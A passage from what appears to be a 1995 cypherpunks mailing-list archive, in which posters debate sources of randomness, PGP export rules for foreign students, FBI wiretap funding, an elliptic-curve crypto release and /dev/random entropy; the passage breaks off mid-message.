I was commenting on the sources of randomness, such as atmospheric RF
variations, antenna configuration, tuner sensitivity, amplifier noise,
etc., that would make prediction of snow bits very difficult.

As to suggesting setting the tuner to dead air, this was just one facet of
the discussion.

I have no brief with any of the proposed schemes: nearly any are better
than what we have now, if widely deployed and suitable used.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From warlord at MIT.EDU  Sat Nov  4 14:10:51 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Sun, 5 Nov 1995 06:10:51 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511042157.NAA09158@ihtfp.org>


Well, MIT does make PGP available to any and all students and staff!
The opinion I've heard is that if the US gov't doesn't want an
international student at MIT to use the code, they should keep that
student from coming to the US.  By allowing the student into the US,
the gov't is implicitly giving them the right to use PGP within the
US.

It is still illegal for them to export it, however any foreign
national can walk up to any computer store and by anything they wish,
and take it on the plane with them.  Therefore, in an institution of
higher learning, the same standards should be allowed.  If the
government does not want your student to have access to possibly
"dangerous" information, then they should not be allowed into the
country at all.

Therefore, I say just make PGP available to your students.

-derek





From black at eng.usf.edu  Sat Nov  4 14:18:25 1995
From: black at eng.usf.edu (James Black)
Date: Sun, 5 Nov 1995 06:18:25 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SUN.3.91.951104170057.2588C-100000@fourier>


Hello,

On Sat, 4 Nov 1995, Derek Atkins wrote:

> It is still illegal for them to export it, however any foreign
> national can walk up to any computer store and by anything they wish,
> and take it on the plane with them.  Therefore, in an institution of
> higher learning, the same standards should be allowed.  If the
> government does not want your student to have access to possibly
> "dangerous" information, then they should not be allowed into the
> country at all.
> 
> Therefore, I say just make PGP available to your students.

  I'm trying, but all the legal angles need to be covered first.  This 
answer helped a great deal though.  Just remember, I am just an undergrad 
student. :)
  Thanx.

James Black






From jek at ininx.com  Sat Nov  4 14:19:26 1995
From: jek at ininx.com (John E. Kreznar)
Date: Sun, 5 Nov 1995 06:19:26 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <m0tBqd0-000147C@ininx.com>


-----BEGIN PGP SIGNED MESSAGE-----

Hallam writes
   Stewart writes
   >Froomkin writes
   >>Hold on.  This is more "factoid" than "fact": recall that income
   >>is PAID by people as well as EARNED by people.  Most payers have
   >>easily detectible physical presence and assets that can easily be
   >>attached by regulators.  It will be a cold day before, e.g., my
   >>employer agrees not to report my earnings.  And the same is true
   >>for most employers in most industries.

   >Unfortunately, this is true, at least for people whose employers
   >are subject to income tax somewhere.  Taxing businesses doesn't
   >make sense economically - you could collect almost as much money
   >with far less disruption to the underlying economy by taxing it as
   >wages for workers and

   Why unfortunately? I happen to consider that our modern social
   ecconomy is a high point of civilisation.

Far from civilized, taxation is a residue of our savage past, and its
resurgence in this century is a backwards movement.

Relations among civilized people are by mutual consent, or not at all.
Taxation (and government generally) is an attempt by one segment of
the population (the political segment) to impose a relation upon the
rest of us to which we do not consent.

   It is certainly a tremendous achievement.  We can educate the
   entire population, provide them with health care, prevent famine
   and provide protection against crime and aggression by other
   states. All in all rather a good deal.

   While one might wish to personally avoid paying taxes there are no
   benefits if everyone avoids paying taxes. There are significant
   areas of the ecconomy which can only be funded through social
   mandates, roads for example.

My interest in cypherpunks is for its potential to enable a personal
cryptographic defense against the arrogant aggressiveness of these
arbitrary and intrusive politically motivated ``social mandates''.

What is your interest in cypherpunks?  To know your intended victims,
perhaps?

   Few people realise that when they use their credit card in a
   supermarket they are supplying a direct mail marketing company with
   a profile of their spending paterns. They are also providing a
   statement of where they are, and indirectly their income, residence
   etc.

So, don't use a credit card!

   What is needed is stringent data protection laws which enforce the
   confidentiality of personal information. Note that both the SEPP
   and STT payments systems conceal the credit card number from the
   merchant.  Cryptographic locks on individual parts of the picture
   are insufficient however. What is needed is laws which make the
   financing of the underlying architecture unecconomic.

Ah yes.  More ``social mandates''

[I don't have time to read or write cypherpunks these days, but the
idea that there's something civilized about taxation leapt out at me
and demanded a response.]

   John E. Kreznar  | 44D955A1F452DF66 | Taxes are caused by people
    jek at ininx.com   | A1575DEF434DC152 |  wanting government benefits.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
Comment: ...because I decline on principle to affirm any nationality.

iQCVAgUBMJvhbQor0ZwpiwZpAQEARgP/bOpwC16JYTxaAA5ExHOEWQl/V6FYTHmo
46MrGVhSh6WLW6yIwMi2I4mhqISjzV6BtFf+/qu6JOOq7JejqdXKZX4SMcAAWuXh
I+p3WSm5QwfLj9rfiKdnCfpO1NNsxx/HBeCIaXEY0tGVbWVp38vf+Kwugoe6a62C
3ylLFqNzgF4=
=NAy5
-----END PGP SIGNATURE-----





From mhkohne at discordia.org  Sat Nov  4 14:43:57 1995
From: mhkohne at discordia.org (Michael Kohne)
Date: Sun, 5 Nov 1995 06:43:57 +0800
Subject: consumer products that make nice sources
Message-ID: <v02120d00acc195427273@[205.164.159.32]>


-----BEGIN PGP SIGNED MESSAGE-----

At 10:34 PM 11/3/95, Timothy C. May wrote:
>At 5:46 PM 11/3/95, Brad Dolan wrote:
>
>>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred

>>I think the following is the right phone number.
>>
>>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>>there, while others are spending much money avoiding radon.
>>
>>Anyway, the pillows make nice sources and good conversation pieces.
>
>I'd say they make poor sources. Far too large. A smaller source has better
>access to the detector without adding much to the overall background the
>user is exposed to. (I'm not saying low-level uranium or thorium sources
>are much of a hazard, but the fluence presented at the detector is very low
>for such an extended source.)

If it's a cheap source of higher-than-background radiation, try a smoke
detector. They are getting darn cheap these days, and my First Alert Model
83R says it contains 1.0 Microcurie of Americium 241. This should raise the
count rate significantly over background. And if one isn't enough, you could
always get several, remove the module with the radioactive materials in it
(it's a sort of black cylinder in mine) from several, and put them all in a
box with the radiation detector. As I remember, I bought 2 or three of these
detectors in a single package for about $15 3 years ago. They should be
quite cheap by now.

Although, I don't think it has the same sort of humor value as the pillow.
(What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJvmh4P3Pba7OSlRAQEDlwP8Cm4vryVejfJZoSd/amwFLxJZWYnPHNxS
3KCmw8jSKjFk4iF+wTvWAHbFIjjkKFGBLt6+BMbDt2eUM6R87mNay1nMASsCoweL
syDr4D39XDUGF6sw7TDulLTW62u7JKaCIGoBQU5+uU4Qxs3YA4QVVR+sLi885ngt
o0GEIeVgLw8=
=hNXr
-----END PGP SIGNATURE-----

----
Michael Kohne                  mhkohne at discordia.org or mhkohne at moberg.com
"Quantum mechanics is your friend"
Key fingerprint =  EE 22 9D 9B 32 5E F1 37  D2 B3 DC 78 19 24 D1 E8







From jamesd at echeque.com  Sat Nov  4 15:12:08 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 5 Nov 1995 07:12:08 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511042303.PAA29063@blob.best.net>


> What is very odd however is the FBI request for $500 million.
> [to tap phones]

What is odd about that? -- when I visited Cuba a couple of years 
ago it looked to me as if a major chunk of the GNP went into
watching people.  (I hear the situation has improved since then,
perhaps thanks to their continuing bankruptcy.)


At 12:09 PM 11/2/95 -0500, hallam at w3.org wrote:
> When the NSA are being asked to comment on an export license they
> are being asked "is this thing dangerous", not "should it be exported".
> But when the response comes back to commerce "its dangerous" you can 
> hardly expect the person on the other end to put their neck out on the
> line and risk allowing [...]

This of course is the basic evil of government regulation:  Bricks are
dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
are dangerous.  Everything is dangerous, because everything could be used 
to cause harm, deliberately or accidentally.

Therefore every action needs to be supervised, controlled, and directed
by your wise and benevolent government, and any attempt to avoid the
benevolent observation of the all seeing eye shows that you must be a 
child pornographer-terrorist-drug-trafficker-money-launderer.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Sat Nov  4 15:12:09 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 5 Nov 1995 07:12:09 +0800
Subject: Telephone switch capacity -Reply
Message-ID: <199511042303.PAA29072@blob.best.net>


At 06:43 PM 11/3/95 -0800, Rich Graves wrote:
> Of course the FBI doesn't have the staff to listen to all these lines, and
> they need an individual court order to authorize each individual
> interception, so this numbers game is a bit of a joke. 


This is false:

The FBI is legally authorized to intercept phone lines by court
order "or other lawful authority".

>From the money it would seem that "other lawful authority" intercepts
vastly exceed court ordered intercepts.

You will recall the vast outcry in the liberal lapdog press when this
vast new power was given to them -- You don't recall it?!  Neither do I.

This is one of the many vast extensions of government power that we
see come down at a steadily increasing rate, to the accompaniment
of total silence from a compliant and submissive mass media.

> There is no controversy about the number of wiretaps that have been
> authorized, except as manufactured by the Spotlight folks and other
> conspiracy loons. 

If the only taps are court ordered wiretaps, it would seem we
are paying about half a million to a million dollars per wire
tap, which is a shade expensive even for government work.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From cryptech at mcs.net  Sat Nov  4 15:21:11 1995
From: cryptech at mcs.net (Mike Rosing)
Date: Sun, 5 Nov 1995 07:21:11 +0800
Subject: Version 2 Elliptic Curve Crypto
Message-ID: <Pine.BSI.3.91.951104165609.18788B-100000@Venus.mcs.com>


Howdy,

	I blew it the first time, but the correct elliptic.2.tar now sits 
on ftp.csua.berkeley.edu/pub/cypherpunks/ciphers.  This version is twice 
as fast as eliptic.tar.  A newer version of the elliptic.2.doc is being
fixed right now, the only difference with what is posted is a correct 
reference to the CRYPTO '95 article on polynomial basis inversion.  Enjoy.

	For a compiled version on Sun or under Borland C++ contact Steve 
Albrecht (eh at mcs.com).  He is in the process of setting up macros to get 
this to compile under just about any unix system.  He's also fixed quite 
a few bugs and is cleaning up a bunch of uninitialized data structures 
that I didn't notice.  Last I heard it was working, so if you want to 
play on a specific platform, contact Steve directly.

	Hilarie Orman from U. Arizona (one of the authors of the CRYPTO 
'95 paper) thinks that calling elliptic curves "strong crypto" may be 
over selling it.  I'm not enough of a mathematician to know how to argue, 
but it seems to me that almost perfect random output is about as close to 
strong crypto as one could get.  Security thru obscurity doesn't work, 
elliptic curves are obscure and so far not studied to the same extent as 
RSA or DES.  However, I'll make the claim that elliptic curves are 
"strong crypto" until proven otherwise.

	Along those lines, does any one have a classic text to encrypt 
for a plaintext/ciphertext challenge?  I'll put something together and 
post it in the next few weeks.  I'll use the symmetric encryption 
subroutine.  If there is any interest, should I put out a public key 
challenge as well?  Note, I ain't rich, so only token prizes (like $50 
ecash and $50 real for each challenge).  The point is to check if this is 
credable crypto, that's all.

	E-mail replies to cryptech at mcs.com.  Thanks for reading this!

Patience, persistence, truth,
Dr. mike






From loki at obscura.com  Sat Nov  4 15:36:08 1995
From: loki at obscura.com (Lance Cottrell)
Date: Sun, 5 Nov 1995 07:36:08 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <acc0fd1a0102100488c4@[137.110.24.250]>


I will feed alt.anonymous.messages to ANYONE who asks. I will accept a feed
of that one group from any news server which is used by a remailer.

        -Lance

At 1:13 PM 11/2/95, Futplex wrote:
>Name Withheld by Request writes:
>[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
>> Denial of service attacks could be made somewhat less feasible by
>> making the pool accessible as a mailing list and via http.
>
>Mailing lists of course suffer the problem of strictly limited participation.
>The web approach might work better, in some future with better privacy-
>protecting infrastructure in place. Specifically, if HTTP transactions with
>a popular web server were routinely encrypted, then all reasonably long
>visits to that site would act as cover traffic for a message pool on that
>server. As a bonus, you could have a spiffy form on the web page that
>searches the pool for you.
>
>In any event, the server could log your exploration. This returns us to the
>issue of strongly anonymous web proxies. (And we could imagine
>countermeasures, like daemons that search for randomly selected pseudonym tags
>to muddy the waters. As Tim might say, lots of issues.)
>
>Also, the mention of "as a mailing list _and_ via http" is significant. Making
>the pool available in multiple forms seems to be an unconditional benefit.
>
>-Futplex <futplex at pseudonym.com>

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------







From ses at tipper.oit.unc.edu  Sat Nov  4 15:39:29 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 07:39:29 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>


On Sat, 4 Nov 1995, Derek Atkins wrote:

> student from coming to the US.  By allowing the student into the US,
> the gov't is implicitly giving them the right to use PGP within the
> US.

This is kind of a risky policy to take. The general feeling I get that 
allowing non green-card holders access to strong cryptography is sort of 
decriminalised, in that the police aren't likely to break down your door 
and have your AFS server accidentaly fall down stairs. However, it is 
still against the law, and could be used against the university in other 
unrelated circumstances.

It seems that licences allowing foreign nationals access to cryptographic 
software within the US are pretty easy to get, and especially for 
something like PGP on a central machine. 

Simon // My name is Spero, Simon Spero - licence to encrypt





From ses at tipper.oit.unc.edu  Sat Nov  4 15:47:02 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 07:47:02 +0800
Subject: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <Pine.SOL.3.91.951104153533.6970C-100000@chivalry>


On Sat, 4 Nov 1995, Michael Kohne wrote:
> 
> Although, I don't think it has the same sort of humor value as the pillow.
> (What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)
> 

I've always wanted to make a RNG by sticking a Brownian motion detector 
into a really hot cup of tea...

Simon // Share and Enjoy(tm)





From stewarts at ix.netcom.com  Sat Nov  4 16:07:14 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:07:14 +0800
Subject: using pgp to make an otp
Message-ID: <199511042351.PAA07430@ix4.ix.netcom.com>


At 09:58 AM 11/5/95 -0500, amp <Alan.Pugh at internetMCI.COM> wrote:
>i want a source of data for use as a otp. 
....
>i'd like to know if there was a reason not to use the output of pgp

Either PGP is a strong enough cryptosystem that you don't need
to use a one-time-pad, or it's not, in which case you need better
randomness than PGP will give you (I doubt it), or you have special
applications for which PGP is impractical (like decrypting small amounts
of data on a very wimpy machine in an environment that you can easily
distribute OTP keys (for using ONCE ONLY)).  Or you're just doing it for fun.

A OTP can give you provably secure cryptography, given that the pad
is only used once, and has real randomness behind it.  If it's only
pseudo-random numbers (e.g. generated from some algorithm), then
it's as crackable as the source of random numbers, and therefore no
longer provably secure.  And of course, if you use it more than once,
or your pad distribution isn't secure, you lose.

>i still need a program to make use of the otp i've produced, 

Two alternatives - spend 5 minutes writing it in a language you know well,
or pick a language you don't know very well and use it as an excuse
to learn the language.  It's slightly more complex than "hello, world",
since you need to input data from two files and use XOR.  

>what are the holes in this?  why would it be unadvisable to do it?
The big problem with OTPs (other than getting people to use the pads
ONLY ONCE, since they're otherwise hosed) is shipping them around;
the traditional method is guys with briefcases handcuffed to their arms....

>otoh, would it be a good basis for a otp?
Large quantities of good random numbers are hard to find.  Small quantities
can come from dice or throwing darts at the stock market pages;
the zener diode or radioactivity methods people have been discussing
will produce larger quantities if you've got the equipment.
If you've got one of those new radio-tuner boards for your PC, tuning it
to an unused station might be quite decent, and we've just been discussing
whether video is any good.

With many of these sources, it's probably worth grinding the numbers through
some sort of compression or encryption algorithm just to smudge over any
periodicity or other structure to it.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From stewarts at ix.netcom.com  Sat Nov  4 16:07:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:07:19 +0800
Subject: Telephone switch capacity
Message-ID: <199511042351.PAA07347@ix4.ix.netcom.com>


>	Please be aware that the current capacity of the
>telephone system in the United States (and for that matter,
>most of the developed world) is only capable of supporting
>between 15 and 20 percent simultaneous telephone
>conversations.  If the FBI wishes to set up a system that is
>capable of monitoring 1% of the total number of lines, that
>equates to a ability to tap 5%, not 1% of all calls in progress.

The FBI now says they only want to tap 1% of simultaneous capacity,
not 1% of total number of lines.  On the other hand, the actual utilization
of the telephone network is also much lower than the number of lines -
back when I was a voice-telephony geek, our estimates for busy-hour
phone utilization were about 1/12 for residential and 1/6 for business
(3 and 6 hundred call-seconds per hour); that was before widespread
use of fax machines, modems, or LANs, so business utilization has
probably increased.  Equipped trunk capacity was typically enough to
have a maximum of 1% blocking during busy hour, which means a certain
amount of margin over average calls in progress, and switch capacity 
depends radically on technology - some kinds of switches are non-blocking,
while others have various capacity limits.

"One Bell System - It Works!"
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From stewarts at ix.netcom.com  Sat Nov  4 16:08:29 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:08:29 +0800
Subject: Video as a source of randomness
Message-ID: <199511042352.PAA07530@ix4.ix.netcom.com>


>>How useful would it be to use a video stream as a source of random input
>>to something like /dev/random?  I'm thinking along the lines of a
>>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>>It seems to me that the picture recieved by a camera sitting atop a
>>monitor would be quite unpredictable. (relatively) High bandwith, too.

Depends on what the camera's looking at - the first frame you grab may have
a lot of entropy, but if there's nothing much going on in the room, 
one frame's going to look a lot like the next.  Of course, pointing the camera
at your keyboard and taking a video of you typing in lots of random
numbers will probably produce better randomness than just timing the keys
while you do so...  But do move it away before typing in your passphrase...
Pointing the camera at a snowy TV or out the window or at a cat playing
with catnip can generate much more randomness if you need it.

Somebody was saying that of course not may computers will have video capture
devices on them, but it was probably one of those parochial PC or Unix geeks
who forget that Mac users get all the cool video/audio gear long before
the rest of us :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From stewarts at ix.netcom.com  Sat Nov  4 16:08:41 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:08:41 +0800
Subject: /dev/random - using up entropy?
Message-ID: <199511042352.PAA07554@ix4.ix.netcom.com>


The discussions of what to do when /dev/random has handed out all of its
available entropy have assumed that entropy gets used up; I'd like to 
propose that maybe it doesn't, at least in the computational-complexity
sense that says that you don't have the computational power around to
calculate the information inside /dev/random from the output,
giving a sort of "computational entropy" that reflects not only the 
uncertainty you have because of randomness but also the uncertainty
you have because of your computational limitations.

Most of the designs I've seen look like this:
        A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
        An input stream I = I1....Ik, which is mixed into R
        A mixing function F which is used to mix R <= F(R,I) 
                for some chunk of I, possibly empty.
        A hash function H, typically MD5.
        An output O = O1...Om = H(R), and E gets mixed after every output.
                (These are capital-o, not zero...)

The entropy E of the reservoir E before an output is
        -SUM(all X) p(X) log p(X)
where X is an event R1=x1, R2=x2 ... Rn=Xn
which is equal to n, assuming the Ri are iid equiprobable 0 or 1.

After an output, the entropy is
        - SUM p(X | H(R)=O) log p(X|H(R)=O)
which works out to n-m, since p(X) is zero if H(R)!=O, and 2**m/2**n if it does.
So that says you use up m bits of entropy if you get m bits of good output.

However, what I'd like to suggest is that you don't, from the perspective
of a user who doesn't have direct access to the reservoir R of random bits.
For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
the user is neither able to invert H, nor to enumerate all possible R,
nor to calculate anything useful based on multiple outputs, since the
reservoir R is shuffled between outputs; even a simple circular shift
may be enough.   This doesn't apply to the case where n is 32 or 48
and the hash function produces n-bit outputs, or even m<<n bit outputs,
because that maybe be inverted or brute-forced, but it seems to apply
for the case where n is sufficiently large and the hash is good.
If the hash is simpler than MD5, it may apply anyway, since the hash
produces far fewer bits than its input, as long as the hash and the
mixing function don't give away any information about the reservoir
between successive outputs.

This would suggest that /dev/random ought to have a mode that says
"give me output of whatever quality you have available",
and that it ought to be OK to use it, as long as the reservoir has 
been seeded with sufficient high-entropy input to have decent randomness.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From warlord at MIT.EDU  Sat Nov  4 16:14:07 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Sun, 5 Nov 1995 08:14:07 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
Message-ID: <199511050001.QAA09434@ihtfp.org>


> This is kind of a risky policy to take. The general feeling I get that 
> allowing non green-card holders access to strong cryptography is sort of 
> decriminalised, in that the police aren't likely to break down your door 
> and have your AFS server accidentaly fall down stairs. However, it is 
> still against the law, and could be used against the university in other 
> unrelated circumstances.

Actually, its not.  There is precedent, in that at one point (rumour
mode on -- I have not verified this story) MIT was asked to not allow
certain students into the MIT nuclear reactor.  These international
students had been accepted into the Nuclear Engineering program, which
sort of requires them to have access.  MIT's response was to tell the
gov't that if they didn't want to let these students have access to
the nuclear reactor, then they should not be allowed in the country,
since MIT will not discriminate against students based on silly
criteria such as where they live.  The state department said they
couldn't do that, since they had nothing to keep the students out of
the country.  MIT responded that they couldnt do it either, and the
gov't backed down.

I'm not convinced that it is as risky as you say.  Besides, MIT does
have a lot of political power, so they are more likely to get away
with it than other places might.  However I think it is a reasonable
position for an educational institution to take.

-derek





From tcmay at got.net  Sat Nov  4 16:19:07 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:19:07 +0800
Subject: using PGP only for digital signatures
Message-ID: <acc13d911f021004b09f@[205.199.118.202]>


Pop Quiz: If you are a citizen of the U.S., prove it.


At 11:33 PM 11/4/95, Simon Spero wrote:
>On Sat, 4 Nov 1995, Derek Atkins wrote:
>
>> student from coming to the US.  By allowing the student into the US,
>> the gov't is implicitly giving them the right to use PGP within the
>> US.
>
>This is kind of a risky policy to take. The general feeling I get that
>allowing non green-card holders access to strong cryptography is sort of
>decriminalised, in that the police aren't likely to break down your door
>and have your AFS server accidentaly fall down stairs. However, it is
>still against the law, and could be used against the university in other
>unrelated circumstances.
>
>It seems that licences allowing foreign nationals access to cryptographic
>software within the US are pretty easy to get, and especially for
>something like PGP on a central machine.

We really need to put this one to bed.

As has been said several times recently, for the purposes of law, non-U.S.
citizens who reside in the U.S are effectively "U.S. persons." Subject to
U.S. law and generally having the same legal rights. (Can't vote. Can be
drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
discriminate against the differently clued, etc.)

All of the nonsense about wearing a "munitions shirt" in front of a
"foreigner" seems to miss this essential point.

Ditto for PGP use.

Consider this: most people in the U.S. do not have a "credential" that
shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
passports.) They have driver's licenses, which say nothing about
citizenship (at least California and Virgina licenses do not). Social
Security cards are the same.

(Second hint: most people are hard-pressed to locate a birth certificate
for themselves. Many people take the easy way out and simply buy a new one
for the $25 a good one costs.)

Therefore, there are few ways that citizenship can be "checked." Period. A
foreigner who wishes to "prove" his non-U.S. status could, of course, show
his green card. But this is different from proving citizenship.

As to the USF--or was it SFSU?--student worried about "allowing" PGP to be
used...I despair at this outlook. Why not simply ignore the issue, not
"give" them PGP, but instead have a few pointers to where PGP may be
gotten.

As to the point about students impersonating faculty, if the faculty starts
signing their messages (doubtful), then no one can impersonate _them_.
(Except that it sounds like all this PGP stuff is to happen on campus
computers, in which case there are several ways their private keys and
passphrases can be snarfed.) The issue of a "credential" for faculty
members, something that says "This person is a member of the Foo U.
faculty," well, this is a different kettle of fish; such credentials are
not part of the PGP system, though webs of trust could in principle be used
in a klugey kind of way.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Sat Nov  4 16:22:23 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:22:23 +0800
Subject: Video as a source of randomness
Message-ID: <acc141f120021004b7ee@[205.199.118.202]>


At 11:51 PM 11/4/95, Bill Stewart wrote:

>Pointing the camera at a snowy TV or out the window or at a cat playing
>with catnip can generate much more randomness if you need it.

Which would make that "dev/cat," right?


--Klaus!







From stewarts at ix.netcom.com  Sat Nov  4 16:52:34 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:52:34 +0800
Subject: on topic!!
Message-ID: <199511050039.QAA02014@ix9.ix.netcom.com>


At 02:17 PM 11/4/95 -0800, VZNuri wrote:
>if there were two key elements here, these conversations would probably
>largely go away (instead of continually reappear)
>- an unambiguous charter
>- an active moderator
>
>unfortunately I suspect that a moderator does exist but he "prefers
>to remain anonymous" ("pseudonymous"?). imho that is precisely 
>how *not* to succeed as a moderator.

As an alternative, there was the Cypherwonks list, which worked just that
way, and such conversations did rapidly go away :-)
What's evolved here instead are a couple of filtered lists,
such as cp-lite, where you can get the conversations that
one or another monitor considers relevant instead of the whole firehose.
It seems to work reasonably well for a lot of people.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Sat Nov  4 16:56:59 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Sun, 5 Nov 1995 08:56:59 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
Message-ID: <m0tBtCg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Simon Spero writes:

: It seems that licences allowing foreign nationals access to cryptographic 
: software within the US are pretty easy to get, and especially for 
: something like PGP on a central machine. 

Really?

Would you please explain how one can apply for such a license?  To say
nothing about how one can actually get one?

Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From weidai at eskimo.com  Sat Nov  4 17:10:47 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sun, 5 Nov 1995 09:10:47 +0800
Subject: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951104163531.19656J-100000@eskimo.com>


On Sat, 4 Nov 1995, Bill Stewart wrote:

> Most of the designs I've seen look like this:
>         A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
>         An input stream I = I1....Ik, which is mixed into R
>         A mixing function F which is used to mix R <= F(R,I) 
>                 for some chunk of I, possibly empty.
>         A hash function H, typically MD5.
>         An output O = O1...Om = H(R), and E gets mixed after every output.
>                 (These are capital-o, not zero...)

I believe PGP uses this approach.  An implementation of it can also be
found in Crypto++ as randpool.cpp. 






From ses at tipper.oit.unc.edu  Sat Nov  4 17:12:18 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 09:12:18 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951104165650.6970E-100000@chivalry>


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.
> 

And here we have the rub. People with permanent residency (i.e. green 
cards) are fully entitled to access to strong crypto. Most foreign 
students are on J-1 visas, which do not grant permanent residency. 

Simon





From llurch at networking.stanford.edu  Sat Nov  4 17:16:43 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 09:16:43 +0800
Subject: [ID point semi-off-topic] Re: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104163117.6549M-100000@Networking.Stanford.EDU>


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Pop Quiz: If you are a citizen of the U.S., prove it.
>...
> As has been said several times recently, for the purposes of law, non-U.S.
> citizens who reside in the U.S are effectively "U.S. persons." Subject to
> U.S. law and generally having the same legal rights. (Can't vote. Can be
> drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
> discriminate against the differently clued, etc.)

All true.

> Consider this: most people in the U.S. do not have a "credential" that
> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> passports.) They have driver's licenses, which say nothing about
